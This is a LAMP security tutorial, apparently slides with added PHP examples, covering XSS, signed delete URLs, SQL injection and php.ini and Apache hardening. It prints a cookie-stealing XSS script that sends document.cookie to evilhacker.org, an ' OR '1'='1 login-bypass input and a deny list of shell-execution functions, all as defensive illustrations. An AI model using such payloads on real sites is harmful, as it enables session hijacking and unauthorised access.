LAMP Security Practices
XSS
Request Forgeries
SQL Injection
Disable PHP, Apache, OS information
Disable unnecessary modules
Log PHP errors
Disable/Limit file uploads
DoS attack
Remote Code execution
Disable dangerous PHP functions
Limit access to file system
XSS
A hacker posts the code snippet given below in
 the comment section of the website
 http://exsite.com.
Hello Everyone!<script>document.write("<img src='http://evilhacker.org/?" + document.cookie + "'>");</script>

The code will load as it is whenever I open
 the website http://exsite.com and will transfer
 my cookie data to the hacker's site
 (http://evilhacker.org):-
Note that the cookie data may contain my login
 credentials, which you as a hacker can use to
XSS solution
All user-submitted content should be filtered and
  all disallowed characters should be removed.
In particular <, >, and all HTML tags should be
  stripped before the content is rendered.
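As an added example, not code from the original slides, the PHP below applies the slide's advice (strip tags) and then encodes what remains so the comment is rendered as text; the payload is the snippet from the XSS slide, used as constructed input, and the `<p class="comment">` wrapper is assumed.

```php
<?php
// Added example, not code from the original slides: make the stored comment
// inert before it is rendered. $payload is the slide's snippet, used here as
// constructed input.

declare(strict_types=1);

/**
 * The slide's advice: strip HTML tags from user-submitted content.
 * strip_tags() removes the <script>, <img> and </script> tags but keeps the
 * text between them, and it is lossy, so it is not a complete defence alone.
 */
function stripUserHtml(string $raw): string
{
    return strip_tags($raw);
}

/**
 * Output encoding: every HTML special character (<, >, &, ", ') becomes an
 * entity, so the browser shows the comment as text and never executes it.
 * Apply this at each point where user data is written into an HTML page.
 */
function encodeForHtml(string $raw): string
{
    return htmlspecialchars($raw, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/** Render a comment: strip tags as the slide says, then encode what remains. */
function renderComment(string $raw): string
{
    return '<p class="comment">' . encodeForHtml(stripUserHtml($raw)) . '</p>';
}

// Constructed input: the comment posted in the XSS slide.
$payload = 'Hello Everyone!<script>document.write("<img src=\'http://evilhacker.org/?"'
    . ' + document.cookie + "\'>");</script>';

echo renderComment($payload), PHP_EOL;  // tags removed, remaining characters encoded
echo encodeForHtml($payload), PHP_EOL;  // original text kept visible but harmless
```

Encoding at output time is what actually prevents the script from running; stripping alone drops characters a legitimate user may have typed and can be bypassed by malformed markup.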
Request Forgeries
Create, Update and Delete requests should be
 verified to have originated from your own
 application.
Ex. Don't use a URL like
 http://mysite.com/photos/delete/photo_id to
 delete a photo. Instead use a signed URL valid
 for a predefined time. Check the code below:-
// Generate a per-session signature and record when it was issued
$_SESSION['signature'] = md5(uniqid(rand(), true) . $username);
$_SESSION['signature_timestamp'] = time();
// Embed the signature in the delete link; the delete handler must compare it
// with the session value and reject it once the predefined time has passed
echo "<a href='http://mysite.com/photos/delete/photo_id?signature={$_SESSION['signature']}'>";
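The slide shows how the signature is issued but not how the delete handler checks it. As an added example, not code from the original slides, the PHP 8 script below issues a random signature, builds the signed link and verifies it with an expiry; the 300-second lifetime, the photo id 42 and the host mysite.com are assumed, and the session is passed as an array so the walk-through runs from the command line.

```php
<?php
// Added example, not code from the original slides: a time-limited,
// per-session signature for state-changing URLs, including the verification
// step the slide leaves out. Assumed lifetime: 300 seconds.

declare(strict_types=1);

const SIGNATURE_TTL = 300; // seconds a signature stays valid (assumed value)

/** Create a fresh signature and store it, with its issue time, in the session. */
function issueSignature(array &$session): string
{
    // random_bytes() is a CSPRNG; md5(uniqid(rand())) from the slide is predictable.
    $signature = bin2hex(random_bytes(32));
    $session['signature'] = $signature;
    $session['signature_timestamp'] = time();
    return $signature;
}

/** Build the delete link that carries the signature (host and route as on the slide). */
function deletePhotoUrl(array &$session, int $photoId): string
{
    $sig = issueSignature($session);
    return 'http://mysite.com/photos/delete/' . $photoId . '?signature=' . urlencode($sig);
}

/**
 * Accept the request only if a signature was issued, it has not expired and
 * it matches the presented value. $now is injectable so expiry can be tested.
 */
function verifySignature(array $session, ?string $presented, ?int $now = null): bool
{
    $now = $now ?? time();
    if ($presented === null || !isset($session['signature'], $session['signature_timestamp'])) {
        return false;
    }
    if ($now - (int) $session['signature_timestamp'] > SIGNATURE_TTL) {
        return false; // stale: the "predefined time" from the slide has passed
    }
    // hash_equals() compares in constant time, so the comparison leaks no timing.
    return hash_equals($session['signature'], $presented);
}

/** After a successful delete, forget the signature so the link cannot be replayed. */
function consumeSignature(array &$session): void
{
    unset($session['signature'], $session['signature_timestamp']);
}

// Constructed walk-through: the server renders the link, then the request comes back.
$session = [];
$url = deletePhotoUrl($session, 42);
parse_str((string) parse_url($url, PHP_URL_QUERY), $query);
$presented = $query['signature'] ?? null;

var_dump(verifySignature($session, $presented));               // genuine request
var_dump(verifySignature($session, 'forged-value'));           // forged request
var_dump(verifySignature($session, $presented, time() + 3600)); // expired request
consumeSignature($session);
var_dump(verifySignature($session, $presented));               // replay after delete
```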
SQL Injection
Ex. Input ' OR '1'='1 in the userid field of the login form. If
 the server script for authentication uses "SELECT * FROM
 tblusers WHERE userid = '{$_GET['userid']}'", this code will be
 interpolated to "SELECT * FROM tblusers WHERE userid = '' OR
 '1'='1'", which will result in valid records being
 returned from the database without a correct userid.
SQL Injection Solution
Use mysqli_real_escape_string($connection, $_GET['userid']) for all
 user-supplied data that is interpolated into a query (the procedural
 form takes the connection as its first argument)
Better, use prepared statements:-
// The value travels separately from the SQL text, so it can never change the query structure
$statement = $connection->prepare("SELECT * FROM tblusers WHERE userid = ?");
// "i" binds an integer; use "s" if userid is a string column
$statement->bind_param("i", $_GET['userid']);
$statement->execute();
Disable PHP information
Run the command :
curl -I http://mysite.com/
HTTP/1.1 200 OK
Date: Sat, 28 Apr 2012 09:48:55 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6

The output shows that the site runs on PHP, and
 the exact PHP version as well
Disable this information by setting expose_php = Off in
  php.ini
Disable Server Information
Run the command :
curl -I http://mysite.com/
HTTP/1.1 200 OK
Date: Sat, 28 Apr 2012 09:48:55 GMT
Server: Apache/2.2.20 (Ubuntu)

The output shows the Apache server, its version, and
 the OS (Ubuntu)
Disable this information by setting
ServerSignature Off
ServerTokens Prod
in the /etc/apache2/conf.d/security file on Ubuntu, or in httpd.conf
Disable unnecessary modules
Use php -m to list the enabled modules
Disable modules like gd if they are not required
On Ubuntu, go to the folder /etc/php5/conf.d
Run: sudo mv gd.{ini,disable}  This renames the file gd.ini to
 gd.disable, so the gd module is no longer
 loaded by PHP
Log PHP errors
Use the following to stop PHP error messages being
 displayed to site users (they reveal paths and code details)
display_errors = Off

Use the following to log the PHP error messages to
 a log file instead
log_errors = On
error_log = /var/log/httpd/php-error.log

For real-time monitoring of the PHP error log use:-
tail -f /var/log/httpd/php-error.log
Disable File Uploads
If your site doesn't need file upload functionality,
   disable it in php.ini :-
file_uploads = Off

If your site needs file upload functionality, limit it to
   the required minimum size :-
file_uploads = On
upload_max_filesize = 1M
DoS attack
To prevent a script from running for an unbounded time and bringing
 down the server, use the following settings:-
max_execution_time = 30
max_input_time = 30
memory_limit = 40M
Remote Code Execution
Remote URLs can be opened by PHP functions
 like fopen, file_get_contents, include and require
When programmers do not filter such URLs carefully,
 they are a frequent cause of code injection and
 data leakage.
To restrict remote file opening:-
allow_url_fopen = Off
allow_url_include = Off
Disable Dangerous PHP functions
Use the following directive to disable the PHP
 functions that are very powerful, dangerous and
 not normally required when PHP is running under
 a web server :-
disable_functions = exec, passthru, shell_exec, system, proc_open, popen,
   curl_exec, curl_multi_exec, parse_ini_file, show_source
Limit Access to File System
Use the following to restrict PHP's access to a part of
 the file system:-
open_basedir="/var/www/html/"

With this setting PHP cannot open files in other parts of the
 file system, such as /etc or /tmp.
Session file path
Session files must be saved outside the web
 site folder. Use the following to change the location
 of session files and upload temporaries:-
session.save_path="/var/lib/php/session"
upload_tmp_dir="/var/lib/php/upload"
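The php.ini slides above (PHP information, error logging, uploads, DoS limits, remote URLs, dangerous functions, open_basedir and session path) each give one directive; as an added example, not code from the original slides, the PHP 8 script below audits a configuration against all of those values at once, either the running interpreter's via ini_get() or a constructed settings array. The document root /var/www/html is assumed, and the sample array is constructed to resemble a stock development php.ini.

```php
<?php
// Added example, not code from the original slides: audit PHP settings against
// the hardening values recommended on the slides. Run as `php audit.php` to
// check the live interpreter; the $sample array at the bottom is constructed.

declare(strict_types=1);

/** ini values such as "Off", "0", "" mean disabled; "On", "1" mean enabled. */
function iniFlag(string $value): bool
{
    return !in_array(strtolower(trim($value)), ['', '0', 'off', 'false', 'no'], true);
}

/** Convert "40M" / "1G" / "512K" into bytes; -1 (unlimited) becomes PHP_INT_MAX. */
function iniBytes(string $value): int
{
    $value = trim($value);
    if ($value === '-1') {
        return PHP_INT_MAX;
    }
    $unit = strtoupper(substr($value, -1));
    $num = (int) $value; // leading digits only, e.g. "40M" -> 40
    return match ($unit) {
        'G' => $num * 1024 ** 3,
        'M' => $num * 1024 ** 2,
        'K' => $num * 1024,
        default => $num,
    };
}

/** Return a list of findings; an empty list means every checked directive is hardened. */
function auditPhpIni(array $ini, string $docRoot = '/var/www/html'): array
{
    $findings = [];
    foreach (['expose_php', 'display_errors', 'allow_url_fopen', 'allow_url_include'] as $name) {
        if (iniFlag($ini[$name] ?? '')) {
            $findings[] = "$name should be Off";
        }
    }
    if (!iniFlag($ini['log_errors'] ?? '')) {
        $findings[] = 'log_errors should be On';
    }
    if (($ini['open_basedir'] ?? '') === '') {
        $findings[] = 'open_basedir is empty: PHP may read /etc, /tmp and the rest of the file system';
    }
    // Functions from the slide's disable_functions list that a web-facing PHP rarely needs.
    $dangerous = ['exec', 'passthru', 'shell_exec', 'system', 'proc_open', 'popen'];
    $disabled = array_map('trim', explode(',', $ini['disable_functions'] ?? ''));
    foreach (array_diff($dangerous, $disabled) as $fn) {
        $findings[] = "$fn is not listed in disable_functions";
    }
    if (iniFlag($ini['file_uploads'] ?? '') && iniBytes($ini['upload_max_filesize'] ?? '2M') > iniBytes('1M')) {
        $findings[] = 'uploads are enabled with upload_max_filesize above 1M';
    }
    if (iniBytes($ini['memory_limit'] ?? '-1') > iniBytes('40M')) {
        $findings[] = 'memory_limit exceeds 40M';
    }
    if ((int) ($ini['max_execution_time'] ?? 0) === 0 || (int) $ini['max_execution_time'] > 30) {
        $findings[] = 'max_execution_time is unlimited (0) or above 30 seconds';
    }
    $savePath = $ini['session.save_path'] ?? '';
    if ($savePath === '' || str_starts_with($savePath, rtrim($docRoot, '/'))) {
        $findings[] = 'session.save_path is unset or inside the web root';
    }
    return $findings;
}

/** Collect the same directives from the running interpreter. */
function liveSettings(): array
{
    $names = ['expose_php', 'display_errors', 'log_errors', 'allow_url_fopen', 'allow_url_include',
        'open_basedir', 'disable_functions', 'file_uploads', 'upload_max_filesize',
        'memory_limit', 'max_execution_time', 'session.save_path'];
    $out = [];
    foreach ($names as $name) {
        $out[$name] = (string) ini_get($name);
    }
    return $out;
}

// Constructed sample resembling a stock development php.ini: expect several findings.
$sample = ['expose_php' => 'On', 'display_errors' => 'On', 'log_errors' => 'Off',
    'allow_url_fopen' => 'On', 'allow_url_include' => 'Off', 'open_basedir' => '',
    'disable_functions' => '', 'file_uploads' => 'On', 'upload_max_filesize' => '2M',
    'memory_limit' => '128M', 'max_execution_time' => '0', 'session.save_path' => '/var/www/html/tmp'];

foreach (auditPhpIni($sample) as $finding) {
    echo "[!] $finding", PHP_EOL;
}
echo count(auditPhpIni(liveSettings())), " finding(s) in the running interpreter's configuration", PHP_EOL;
```

Run it under the web server's PHP (not only the CLI), since the CLI SAPI reads its own php.ini and defaults max_execution_time to 0.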
Write protect conf and application files
Use the chattr +i command to write-protect any file
chattr +i /etc/php5/php.ini
chattr +i /etc/mysql/my.cnf
chattr +i /etc/apache2/apache2.conf
chattr +i /var/www/html/

Such files then cannot be modified, even by the root
 user, while the attribute is set.
Use the chattr -i command to remove the write
 protection again